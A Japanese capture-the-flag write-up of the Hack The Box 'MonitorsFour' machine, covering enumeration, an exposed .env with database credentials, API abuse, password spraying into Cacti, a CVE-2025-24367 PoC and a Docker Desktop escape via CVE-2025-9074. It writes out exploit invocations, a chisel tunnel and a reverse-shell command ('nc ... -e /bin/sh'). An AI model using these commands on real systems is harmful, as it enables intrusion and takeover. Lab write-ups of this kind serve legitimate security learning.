初めに
本記事は Hack The Box(以下リンク参照) の「MonitorsFour」にチャレンジした際の WriteUp になります。
※以前までのツールの使い方など詳細を書いたものではないのでご了承ください。
※悪用するのはやめてください。あくまで社会への貢献のためにこれらの技術を使用してください。法に触れるので。
初期探索
さて、やってきましたWindows許さないマンです。やっていき!
ポートスキャン
┌──(kali㉿kali)-[~/Desktop]
└─$ rustscan -a 10.129.31.247 --top
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.129.31.247:80
Open 10.129.31.247:5985
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-06 20:13 EST
Initiating Ping Scan at 20:13
Scanning 10.129.31.247 [4 ports]
Completed Ping Scan at 20:13, 0.29s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 20:13
Scanning monitorsfour.htb (10.129.31.247) [2 ports]
Discovered open port 80/tcp on 10.129.31.247
Discovered open port 5985/tcp on 10.129.31.247
Completed SYN Stealth Scan at 20:13, 0.29s elapsed (2 total ports)
Nmap scan report for monitorsfour.htb (10.129.31.247)
Host is up, received echo-reply ttl 127 (0.25s latency).
Scanned at 2025-12-06 20:13:30 EST for 0s
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
ADぽくはないね。ただのWindowsのWebサーバーかな?
Web探索
80番ポートにアクセスするとmonitorsfour.htbにリダイレクトされるので以下の設定を/etc/hostsに突っ込みます。
10.129.31.247 monitorsfour.htb
再度アクセスすると以下の表示になります。
え、/var/www...これはコンテナですか?Windows許さないマン...
とりあえずwhatweb回すわ。
┌──(kali㉿kali)-[~/Desktop/WhatWeb]
└─$ ./whatweb -v http://monitorsfour.htb/
WhatWeb report for http://monitorsfour.htb/
Status : 200 OK
Title : MonitorsFour - Networking Solutions
IP : 10.129.31.247
Country : RESERVED, ZZ
Summary : Bootstrap, Cookies[PHPSESSID], Email[sales@monitorsfour.htb], HTTPServer[nginx], JQuery, nginx, PHP[8.3.27], Script, X-Powered-By[PHP/8.3.27], X-UA-Compatible[IE=edge]
Detected Plugins:
[ Bootstrap ]
Bootstrap is an open source toolkit for developing with
HTML, CSS, and JS.
Website : https://getbootstrap.com/
[ Cookies ]
Display the names of cookies in the HTTP headers. The
values are not returned to save on space.
String : PHPSESSID
[ Email ]
Extract email addresses. Find valid email address and
syntactically invalid email addresses from mailto: link
tags. We match syntactically invalid links containing
mailto: to catch anti-spam email addresses, eg. bob at
gmail.com. This uses the simplified email regular
expression from
http://www.regular-expressions.info/email.html for valid
email address matching.
String : sales@monitorsfour.htb
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
String : nginx (from server string)
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Website : http://jquery.com/
[ PHP ]
PHP is a widely-used general-purpose scripting language
that is especially suited for Web development and can be
embedded into HTML. This plugin identifies PHP errors,
modules and versions and extracts the local file path and
username if present.
Version : 8.3.27
Google Dorks: (3)
Website : http://www.php.net/
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
[ X-Powered-By ]
X-Powered-By HTTP header
String : PHP/8.3.27 (from x-powered-by string)
[ X-UA-Compatible ]
This plugin retrieves the X-UA-Compatible value from the
HTTP header and meta http-equiv tag. - More Info:
http://msdn.microsoft.com/en-us/library/cc817574.aspx
String : IE=edge
[ nginx ]
Nginx (Engine-X) is a free, open-source, high-performance
HTTP server and reverse proxy, as well as an IMAP/POP3
proxy server.
Website : http://nginx.net/
HTTP Headers:
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 07 Dec 2025 01:12:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/8.3.27
Set-Cookie: PHPSESSID=bc0f19c49bcbc8e126b39bc983ef3ce2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Encoding: gzip
PHPか。
サブドメイン列挙
┌──(kali㉿kali)-[~/Desktop]
└─$ ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:FUZZ -u http://monitorsfour.htb/ -H "Host: FUZZ.monitorsfour.htb" -mc all -fs 138 -t 150
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://monitorsfour.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.monitorsfour.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 150
:: Matcher : Response status: all
:: Filter : Response size: 138
________________________________________________
cacti [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 258ms]
:: Progress: [100000/100000] :: Job [1/1] :: 592 req/sec :: Duration: [0:02:55] :: Errors: 0 ::
お、アクセスしてみる。
/etc/hostsにcacti.monitorsfour.htbは突っ込んでね。
適当にadmin:adminしてみる。
ダメー
v1.2.28なのでこれを調べてみると以下色々とPOCが見つかった。
認証済だと悪用できそうなので認証情報が必要そう。別途情報収集が必要そうだ。
ディレクトリ探索
元々のサブドメインがない方を列挙していく。
┌──(kali㉿kali)-[~/Desktop]
└─$ katana -u http://monitorsfour.htb
__ __
/ /_____ _/ /____ ____ ___ _
/ '_/ _ / __/ _ / _ \/ _ /
/_/\_\\_,_/\__/\_,_/_//_/\_,_/
projectdiscovery.io
[INF] Current katana version v1.1.2 (outdated)
[INF] Started standard crawling for => http://monitorsfour.htb
http://monitorsfour.htb
http://monitorsfour.htb/static/js/smoothscroll.js
http://monitorsfour.htb/static/js/custom.js
http://monitorsfour.htb/static/js/plugins.js
http://monitorsfour.htb/static/js/popper.min.js
http://monitorsfour.htb/static/js/bootstrap.min.js
http://monitorsfour.htb/static/js/owl.carousel.min.js
http://monitorsfour.htb/static/css/style.css
http://monitorsfour.htb/static/css/plugins.css
http://monitorsfour.htb/static/js/jquery-min.js
http://monitorsfour.htb/login
http://monitorsfour.htb/static/admin/assets/js/plugins/loaders/blockui.min.js
http://monitorsfour.htb/static/admin/assets/js/plugins/loaders/pace.min.js
http://monitorsfour.htb/static/admin/assets/js/core/app.js
http://monitorsfour.htb/static/admin/assets/css/minified/colors.min.css
http://monitorsfour.htb/static/admin/assets/js/core/libraries/jquery.min.js
http://monitorsfour.htb/static/admin/assets/css/minified/core.min.css
http://monitorsfour.htb/static/admin/assets/js/core/libraries/bootstrap.min.js
http://monitorsfour.htb/static/admin/assets/css/icons/icomoon/styles.css
http://monitorsfour.htb/static/admin/assets/css/minified/bootstrap.min.css
http://monitorsfour.htb/static/admin/assets/css/minified/components.min.css
http://monitorsfour.htb/
http://monitorsfour.htb/static/admin/assets/js/plugins/loaders/'+i.iframeSrc+'
http://monitorsfour.htb/forgot-password
┌──(kali㉿kali)-[~/Desktop]
└─$ dirsearch -u http://monitorsfour.htb/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/Desktop/reports/http_monitorsfour.htb/__25-12-06_20-30-16.txt
Target: http://monitorsfour.htb/
[20:30:16] Starting:
[20:30:23] 200 - 97B - /.env
[20:30:26] 403 - 548B - /.ht_wsr.txt
[20:30:26] 403 - 548B - /.htaccess.bak1
[20:30:26] 403 - 548B - /.htaccess.orig
[20:30:26] 403 - 548B - /.htaccess.sample
[20:30:26] 403 - 548B - /.htaccess.save
[20:30:26] 403 - 548B - /.htaccess_extra
[20:30:26] 403 - 548B - /.htaccess_orig
[20:30:26] 403 - 548B - /.htaccess_sc
[20:30:26] 403 - 548B - /.htaccessBAK
[20:30:26] 403 - 548B - /.htaccessOLD
[20:30:26] 403 - 548B - /.htaccessOLD2
[20:30:26] 403 - 548B - /.htm
[20:30:26] 403 - 548B - /.html
[20:30:26] 403 - 548B - /.htpasswds
[20:30:26] 403 - 548B - /.htpasswd_test
[20:30:26] 403 - 548B - /.httr-oauth
[20:31:17] 200 - 367B - /contact
[20:31:17] 403 - 548B - /controllers/
[20:31:40] 200 - 4KB - /login
[20:32:10] 301 - 162B - /static -> http://monitorsfour.htb/static/
[20:32:17] 200 - 35B - /user
[20:32:19] 301 - 162B - /views -> http://monitorsfour.htb/views/
.envがあるので中身を見る。
.env
DB_HOST=mariadb
DB_PORT=3306
DB_NAME=monitorsfour_db
DB_USER=monitorsdbuser
DB_PASS=f37p2j8f4t0r
DBの情報ぽいが、これでcactiにこの資格情報を突っ込んでみた。
ダメー!
もっと深く探索してみる。これは列挙BOXぽい。
┌──(kali㉿kali)-[~/Desktop]
└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt:FUZZ -recursion -recursion-depth 2 -e .php,.txt,.pdf -u http://monitorsfour.htb/FUZZ -t 150
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://monitorsfour.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/big.txt
:: Extensions : .php .txt .pdf
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 150
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.htaccess [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 296ms]
.htpasswd.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 308ms]
.htaccess.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 309ms]
.htaccess.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 308ms]
.htpasswd [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 315ms]
.htpasswd.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 319ms]
contact [Status: 200, Size: 367, Words: 34, Lines: 5, Duration: 459ms]
controllers [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 283ms]
[INFO] Adding a new job to the queue: http://monitorsfour.htb/controllers/FUZZ
forgot-password [Status: 200, Size: 3099, Words: 164, Lines: 84, Duration: 678ms]
login [Status: 200, Size: 4340, Words: 1342, Lines: 96, Duration: 1596ms]
static [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 257ms]
[INFO] Adding a new job to the queue: http://monitorsfour.htb/static/FUZZ
user [Status: 200, Size: 35, Words: 3, Lines: 1, Duration: 1518ms]
views [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 321ms]
[INFO] Adding a new job to the queue: http://monitorsfour.htb/views/FUZZ
[INFO] Starting queued job on target: http://monitorsfour.htb/controllers/FUZZ
.htaccess [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 279ms]
.htaccess.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 280ms]
.htaccess.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 284ms]
.htpasswd.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 284ms]
.htpasswd [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 286ms]
.htpasswd.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 286ms]
[INFO] Starting queued job on target: http://monitorsfour.htb/static/FUZZ
.htaccess.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 279ms]
.htaccess [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 283ms]
.htpasswd.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 290ms]
.htaccess.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 290ms]
.htpasswd [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 290ms]
.htpasswd.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 290ms]
admin [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 286ms]
[INFO] Adding a new job to the queue: http://monitorsfour.htb/static/admin/FUZZ
css [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 318ms]
[INFO] Adding a new job to the queue: http://monitorsfour.htb/static/css/FUZZ
fonts [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 418ms]
[INFO] Adding a new job to the queue: http://monitorsfour.htb/static/fonts/FUZZ
images [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 332ms]
[INFO] Adding a new job to the queue: http://monitorsfour.htb/static/images/FUZZ
js [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 318ms]
[INFO] Adding a new job to the queue: http://monitorsfour.htb/static/js/FUZZ
[INFO] Starting queued job on target: http://monitorsfour.htb/views/FUZZ
.htpasswd.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 266ms]
.htpasswd.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 271ms]
.htaccess.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 279ms]
.htaccess [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 285ms]
.htpasswd [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 288ms]
.htaccess.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 288ms]
admin [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 306ms]
[INFO] Adding a new job to the queue: http://monitorsfour.htb/views/admin/FUZZ
forgot_password.php [Status: 200, Size: 3099, Words: 164, Lines: 84, Duration: 3836ms]
index.php [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 1021ms]
login.php [Status: 200, Size: 4340, Words: 1342, Lines: 96, Duration: 1972ms]
[INFO] Starting queued job on target: http://monitorsfour.htb/static/admin/FUZZ
.htpasswd.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 295ms]
.htaccess [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 299ms]
.htpasswd [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 299ms]
.htpasswd.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 299ms]
.htaccess.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 299ms]
.htaccess.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 300ms]
assets [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 256ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://monitorsfour.htb/static/admin/assets/
[INFO] Starting queued job on target: http://monitorsfour.htb/static/css/FUZZ
.htaccess [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 266ms]
.htpasswd.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 266ms]
.htpasswd [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 266ms]
.htaccess.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 282ms]
.htpasswd.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 282ms]
.htaccess.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 282ms]
viewsやcontrollersがあるのでCVMのWEBでよく使われる構成のようだ。
viewで色々元のPHPが見えそうなレスポンスを返しているのでここらを深ぼる。
┌──(kali㉿kali)-[~/Desktop]
└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt:FUZZ -recursion -recursion-depth 2 -e .php,.txt,.pdf -u http://monitorsfour.htb/views/admin/FUZZ -t 150
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://monitorsfour.htb/views/admin/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/big.txt
:: Extensions : .php .txt .pdf
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 150
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.htpasswd.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 286ms]
.htaccess [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 286ms]
.htpasswd.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 286ms]
.htpasswd [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 292ms]
.htaccess.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 294ms]
.htaccess.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 314ms]
api.php [Status: 200, Size: 9229, Words: 763, Lines: 215, Duration: 1217ms]
changelog.php [Status: 200, Size: 8471, Words: 511, Lines: 197, Duration: 1827ms]
customers.php [Status: 200, Size: 9491, Words: 979, Lines: 221, Duration: 4026ms]
dashboard.php [Status: 200, Size: 28212, Words: 1169, Lines: 653, Duration: 1669ms]
footer.php [Status: 200, Size: 302, Words: 22, Lines: 20, Duration: 891ms]
invoices.php [Status: 200, Size: 19023, Words: 4839, Lines: 415, Duration: 2026ms]
navbar.php [Status: 200, Size: 7706, Words: 353, Lines: 161, Duration: 1353ms]
tasks.php [Status: 200, Size: 9317, Words: 884, Lines: 217, Duration: 909ms]
users.php [Status: 200, Size: 13987, Words: 2930, Lines: 321, Duration: 3455ms]
:: Progress: [81912/81912] :: Job [1/1] :: 109 req/sec :: Duration: [0:15:46] :: Errors: 0 ::
色々見つかった。見てみる。
adminでログインできた時のページみたいだ。
API keyを作れるようなボタンがあるのでAPIがあるようだ。実際にログインページでのログインの挙動に/api/v1/authなどのエンドポイントが見えたのでここも列挙していく。
┌──(kali㉿kali)-[~/Desktop]
└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt:FUZZ -u http://monitorsfour.htb/api/v1/FUZZ -t 150
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://monitorsfour.htb/api/v1/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/big.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 150
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.htpasswd [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 298ms]
.htaccess [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 297ms]
auth [Status: 405, Size: 0, Words: 1, Lines: 1, Duration: 692ms]
logout [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 374ms]
reset [Status: 405, Size: 0, Words: 1, Lines: 1, Duration: 1754ms]
user [Status: 200, Size: 35, Words: 3, Lines: 1, Duration: 3299ms]
users [Status: 200, Size: 35, Words: 3, Lines: 1, Duration: 2981ms]
:: Progress: [20478/20478] :: Job [1/1] :: 100 req/sec :: Duration: [0:02:43] :: Errors: 0 ::
一杯ある。。。apiわからんよー。。。
イニシャルアクセス
Abuse API
/api/v1/usersとかでユーザ情報列挙できないか?
tokenパラメータが不正といわれるので適当に埋めてみる。色々ガチャガチャしてたら以下でなんかできた。
何でできたかはわからん。
適当にToken埋めてガチャガチャしてたらなんかいった。なんでや!
パスワードのハッシュがあるので解析してみる。
解析出来たのでログインできそう!
行けたわ。
CVE-2025-24367
Password Spray
このWeb上でMariaDBへのSQLiができそうか試していたが、特段有用そうなルートは見つからなかった。
と言っても以下の記載を見つける。
あーこれ見たことあるわ。ホスト環境のファイル見放題になるWidnows Docker Desktopの脆弱性JAN!
特権昇格までのルート見えたわ。後はcactiにログインするのみ。
んじゃ認証情報直でcactiに突っ込んでみる。
adminのアカウントではダメだったので、「Marcus Higgins」さんの名前を拝借して試してみる。
名前のリストを以下で作成する。
┌──(kali㉿kali)-[~/Desktop/username-anarchy]
└─$ ./username-anarchy Marcus Higgins > marcus.txt
┌──(kali㉿kali)-[~/Desktop/username-anarchy]
└─$ cat marcus.txt
marcus
marcushiggins
marcus.higgins
marcushi
marchigg
marcush
m.higgins
mhiggins
hmarcus
h.marcus
higginsm
higgins
higgins.m
higgins.marcus
mh
適当にスプレーしてみたら初手のmarcus:wonderful1で引っかかった。
これでPOCを試せる!
RCE
4444ポートで待ち受けてPOCを実施する。
┌──(kali㉿kali)-[~/Desktop/CVE-2025-24367-Cacti-PoC]
└─$ python exploit.py --user marcus -p wonderful1 -i 10.10.14.8 -l 4444 -url http://cacti.monitorsfour.htb
[+] Cacti Instance Found!
[+] Serving HTTP on port 80
[+] Login Successful!
[+] Got graph ID: 226
[i] Created PHP filename: ThRXY.php
[+] Got payload: /bash
[i] Created PHP filename: CCzIB.php
[+] Hit timeout, looks good for shell, check your listener!
[+] Stopped HTTP server on port 80
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.8] from (UNKNOWN) [10.129.104.46] 53332
bash: cannot set terminal process group (8): Inappropriate ioctl for device
bash: no job control in this shell
www-data@821fbd6a43fa:~/html/cacti$
勝ちかな?
特権昇格
CVE-2025-9074
Docker Desktopの脆弱性が見えてたので調べると以下のPOCが見つかった。
よし、あとはExploit指すためのネットワーク列挙をしていく。
www-data@821fbd6a43fa:~/app$ ss -lntp
ss -lntp
State Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
LISTEN 0 511 0.0.0.0:80 0.0.0.0:* users:(("nginx",pid=13,fd=9),("nginx",pid=12,fd=9))
LISTEN 0 4096 127.0.0.11:37787 0.0.0.0:*
LISTEN 0 4096 *:9000 *:*
www-data@821fbd6a43fa:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host proto kernel_lo
valid_lft forever preferred_lft forever
2: eth0@if7: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 3e:c7:50:15:98:b0 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 172.18.0.3/16 brd 172.18.255.255 scope global eth0
valid_lft forever preferred_lft forever
www-data@821fbd6a43fa:/$
www-data@821fbd6a43fa:/$ ip route
ip route
default via 172.18.0.1 dev eth0
172.18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.3
www-data@821fbd6a43fa:/$
適当に以下で調べると127.0.0.11は名前解決のサービスらしい。
resolv.confでそれが見えるようなので見てみる。
www-data@821fbd6a43fa:/etc$ cat resolv.conf
cat resolv.conf
# Generated by Docker Engine.
# This file can be edited; Docker Engine will not make further changes once it
# has been modified.
nameserver 127.0.0.11
options ndots:0
# Based on host file: '/etc/resolv.conf' (internal resolver)
# ExtServers: [host(192.168.65.7)]
# Overrides: []
# Option ndots from: internal
www-data@821fbd6a43fa:/etc$
192.168.65.7がホストの様なので2375ポートが開いてるか確認する。
www-data@821fbd6a43fa:/etc$ curl http://192.168.65.7:2375
curl http://192.168.65.7:2375
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 29 0 29 0 0 4878 0 --:--:-- --:--:-- --:--:-- 5800
{"message":"page not found"}
www-data@821fbd6a43fa:/etc$
行けそう。
んじゃChisel張ってKaliからExploit実行していく。
┌──(kali㉿kali)-[~/Desktop]
└─$ ./chisel_1.9.0_linux_amd64 server -p 2345 --socks5 --reverse
2025/12/07 09:26:17 server: Reverse tunnelling enabled
2025/12/07 09:26:17 server: Fingerprint YEq1g7zX+eUeM839od8APiSYo3d4lxRiiCM6KuoQ/zc=
2025/12/07 09:26:17 server: Listening on http://0.0.0.0:2345
2025/12/07 09:27:19 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
www-data@821fbd6a43fa:/tmp$ ./chisel client --max-retry-count 2 10.10.14.8:2345 R:socks
< client --max-retry-count 2 10.10.14.8:2345 R:socks
2025/12/07 14:27:24 client: Connecting to ws://10.10.14.8:2345
2025/12/07 14:27:26 client: Connected (Latency 257.825908ms)
キタのでトンネル経由でExploitを指す!
┌──(kali㉿kali)-[~/Desktop]
└─$ proxychains4 -q python3 exploit.py -u http://192.168.65.7:2375 -c 'ls /host_root/'
[+] Container created:
{
"Id": "082c3229301d7499948fa3572a6dc56735a690e49fbf19bc4bffac8bfcf2cdc1",
"Warnings": []
}
[+] Container 082c3229301d7499948fa3572a6dc56735a690e49fbf19bc4bffac8bfcf2cdc1 started successfully!
[+] Container logs:
4ls: /host_root/DumpStack.log.tmp: Permission denied
/ls: /host_root/pagefile.sys: Permission denied
$RECYCLE.BIN
$WinREAgent
Documents and Settings
PerfLogs
Program Files
Program Files (x86)
ProgramData
Recovery
␦System Volume Information
Users
Windows
Windows.old
inetpub
あ、指せてそう。んじゃリバースシェルをゲットします。
┌──(kali㉿kali)-[~/Desktop]
└─$ proxychains4 -q python3 exploit.py -u http://192.168.65.7:2375 -c 'nc 10.10.14.8 8444 -e /bin/sh'
[+] Container created:
{
"Id": "ffe3adbbf686c0b282518f530931f28a3d66dc8597a0561db73649ffdcf38183",
"Warnings": []
}
[+] Container ffe3adbbf686c0b282518f530931f28a3d66dc8597a0561db73649ffdcf38183 started successfully!
[+] Container logs:
勝ちです。
ユーザフラグとルートフラグは同時取りでした。
あれ???Windowsは????
まとめ
これで特権昇格に成功し、Root 権限の奪取に成功しました。
Windowsなんてなかった!これはOS詐欺!
今回もセキュリティエンジニアの皆さんの助けになればなと思います。